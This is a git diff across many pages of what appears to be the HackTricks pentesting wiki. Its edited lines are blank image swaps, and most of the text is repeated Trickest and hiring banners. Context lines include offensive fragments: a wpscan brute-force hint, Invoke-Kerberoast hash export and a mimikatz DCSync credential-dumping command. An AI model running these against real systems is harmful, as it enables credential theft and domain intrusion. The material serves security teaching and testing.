@@ -285,7 +285,7 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -429,7 +429,7 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index d86595f92..d670ad96a 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -125,7 +125,7 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -232,7 +232,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index 15365a854..99e9b3a9c 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -177,7 +177,7 @@ See the following documentation for further details and more complex examples:
* [**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)
* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md
index 4fba049da..892badaf7 100644
--- a/pentesting-web/command-injection.md
+++ b/pentesting-web/command-injection.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -168,7 +168,7 @@ powershell C:**2\n??e*d.*? # notepad
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index 2fca6bd9f..e9c58814d 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -249,7 +249,7 @@ The best prevention technique is to not use users input directly inside response
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 569ede7bc..cabeb410a 100644
--- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -237,7 +237,7 @@ out of band request with the current username
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
index 33c6c50f9..1bf109a49 100644
--- a/pentesting-web/domain-subdomain-takeover.md
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -89,7 +89,7 @@ All of them vulnerable to subdomain takeover. All of them were big brands. Talki
Nevertheless, recent phishing campaigns host content on domains with long domain names that include name of the brand (see [Apple example](https://www.phishtank.com/target\_search.php?target\_id=183\&valid=y\&active=All\&Search=Search)). Having valid SSL certificate (more on that below), keyword in domain name and website which mimics the website of targeted brand, people tend to fall into these attacks. Think about chances with a legitimate subdomain of this brand.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -183,7 +183,7 @@ Until next time!
[Patrik](https://twitter.com/0xpatrik)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/email-injections.md b/pentesting-web/email-injections.md
index 9161cde28..fb49a2fb7 100644
--- a/pentesting-web/email-injections.md
+++ b/pentesting-web/email-injections.md
@@ -1,6 +1,6 @@
# Email Injections
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -165,7 +165,7 @@ So, if you are able to **send mails (maybe invitations) from the web application
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/file-inclusion/phar-deserialization.md b/pentesting-web/file-inclusion/phar-deserialization.md
index cfd503f8c..155ec0d8c 100644
--- a/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/pentesting-web/file-inclusion/phar-deserialization.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -89,7 +89,7 @@ php vuln.php
{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
index 4a022b3d6..1c08a077d 100644
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@@ -1,6 +1,6 @@
# NoSQL injection
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -137,7 +137,7 @@ It's possible to use [**$lookup**](https://www.mongodb.com/docs/manual/reference
]
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -282,7 +282,7 @@ for u in get_usernames():
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md
index 282966db3..684644430 100644
--- a/pentesting-web/race-condition.md
+++ b/pentesting-web/race-condition.md
@@ -1,6 +1,6 @@
# Race Condition
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -52,7 +52,7 @@ Note that It **doesn't work for static files** on certain servers but as static
Using this technique, you can make 20-30 requests arrive at the server simultaneously - regardless of network jitter:
-
+
**Adapting to the target architecture**
@@ -72,13 +72,13 @@ If connection warming doesn't make any difference, there are various solutions t
Using Turbo Intruder, you can introduce a short client-side delay. However, as this involves splitting your actual attack requests across multiple TCP packets, you won't be able to use the single-packet attack technique. As a result, on high-jitter targets, the attack is unlikely to work reliably regardless of what delay you set.
-
+
Instead, you may be able to solve this problem by abusing a common security feature.
Web servers often **delay the processing of requests if too many are sent too quickly**. By sending a large number of dummy requests to intentionally trigger the rate or resource limit, you may be able to cause a suitable server-side delay. This makes the single-packet attack viable even when delayed execution is required.
-
+
{% hint style="warning" %}
For more information about this technique check the original report in [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
@@ -88,7 +88,7 @@ For more information about this technique check the original report in [https://
* **Tubo Intruder - HTTP2 single-packet attack (1 endpoint)**: You can send the request to **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`), you can change in the request the value you want to brute force for **`%s`** like in `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s` and then select the **`examples/race-single-packer-attack.py`** from the drop down:
-
+
If you are going to **send different values**, you could modify the code with this one that uses a wordlist from the clipboard:
@@ -141,7 +141,7 @@ Content-Length: 0
* For **delaying** the process **between** processing **one request and another** in a 2 substates steps, you could **add extra requests between** both requests.
* For a **multi-endpoint** RC you could start sending the **request** that **goes to the hidden state** and then **50 requests** just after it that **exploits the hidden state**.
-
+
### Raw BF
@@ -238,7 +238,7 @@ Operations that edit existing data (such as changing an account's primary email
Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations:
-
+
2. **Probe for clues**
@@ -339,7 +339,7 @@ In [**WS\_RaceCondition\_PoC**](https://github.com/redrays-io/WS\_RaceCondition\
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/rate-limit-bypass.md b/pentesting-web/rate-limit-bypass.md
index 3d8b4d53b..6a341c252 100644
--- a/pentesting-web/rate-limit-bypass.md
+++ b/pentesting-web/rate-limit-bypass.md
@@ -1,6 +1,6 @@
# Rate Limit Bypass
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -73,7 +73,7 @@ Maybe if you **login into your account before each attempt** (or each set of X t
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md
index fed04b206..25dcce5b4 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -1,6 +1,6 @@
# SSRF (Server Side Request Forgery)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -233,7 +233,7 @@ if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -351,7 +351,7 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md
index bba3f253a..96c6b3bc5 100644
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@@ -1,6 +1,6 @@
# XS-Search/XS-Leaks
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -76,7 +76,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/)
**Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -214,7 +214,7 @@ You can perform the same attack with **`portal`** tags.
Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in).
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -311,7 +311,7 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
##
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -875,7 +875,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
* **Summary:** The [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API can be used to measure how much time it takes to perform a request using `window.open`. Other clocks could be used.
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -1000,7 +1000,7 @@ More generic methods:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 7e78303fa..fda727e3b 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -31,7 +31,7 @@ In the Burp's builtin browser go to the **Burp extension** and enable it:
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
-
+
### Inject a Canary
diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md
index c24e09d5a..2ee989d71 100644
--- a/stego/stego-tricks.md
+++ b/stego/stego-tricks.md
@@ -86,7 +86,7 @@ cmp original.jpg stego.jpg -b -l
If you find that a **text line** is **bigger** than it should be, then some **hidden information** could be included inside the **spaces** using invisible characters.\
To **extract** the **data**, you can use: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/dcsync.md b/windows-hardening/active-directory-methodology/dcsync.md
index 7b022a6a2..029980756 100644
--- a/windows-hardening/active-directory-methodology/dcsync.md
+++ b/windows-hardening/active-directory-methodology/dcsync.md
@@ -1,6 +1,6 @@
# DCSync
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -101,7 +101,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/kerberoast.md b/windows-hardening/active-directory-methodology/kerberoast.md
index f41bf009a..700ca98a9 100644
--- a/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/windows-hardening/active-directory-methodology/kerberoast.md
@@ -1,6 +1,6 @@
# Kerberoast
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -111,7 +111,7 @@ Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASC
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -175,7 +175,7 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md
index dd6924bea..ab30add5c 100644
--- a/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -65,7 +65,7 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/active-directory-methodology/silver-ticket.md b/windows-hardening/active-directory-methodology/silver-ticket.md
index 2ed697e79..bb31da385 100644
--- a/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -168,7 +168,7 @@ mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.loc
[dcsync.md](dcsync.md)
{% endcontent-ref %}
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/authentication-credentials-uac-and-efs.md b/windows-hardening/authentication-credentials-uac-and-efs.md
index 240924cbb..4b9714535 100644
--- a/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -273,7 +273,7 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
[uac-user-account-control.md](windows-security-controls/uac-user-account-control.md)
{% endcontent-ref %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index d603a5a0b..d539f9a7a 100644
--- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -1,6 +1,6 @@
# ACLs - DACLs/SACLs/ACEs
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -93,7 +93,7 @@ The canonical order ensures that the following takes place:
* An explicit **access-denied ACE is enforced regardless of any explicit access-allowed ACE**. This means that the object's owner can define permissions that allow access to a group of users and deny access to a subset of that group.
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -213,7 +213,7 @@ The table below shows the layout of each ACE.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index f4d4010ab..f1ca230ea 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -243,7 +243,7 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
}
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 089fb0468..9ff685f4d 100644
--- a/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -351,7 +351,7 @@ Find more Autoruns like registries in [https://www.microsoftpressstore.com/artic
* [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
* [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/windows-hardening/windows-security-controls/uac-user-account-control.md b/windows-hardening/windows-security-controls/uac-user-account-control.md
index 4d37c1fb4..972eda2e2 100644
--- a/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -220,7 +220,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today: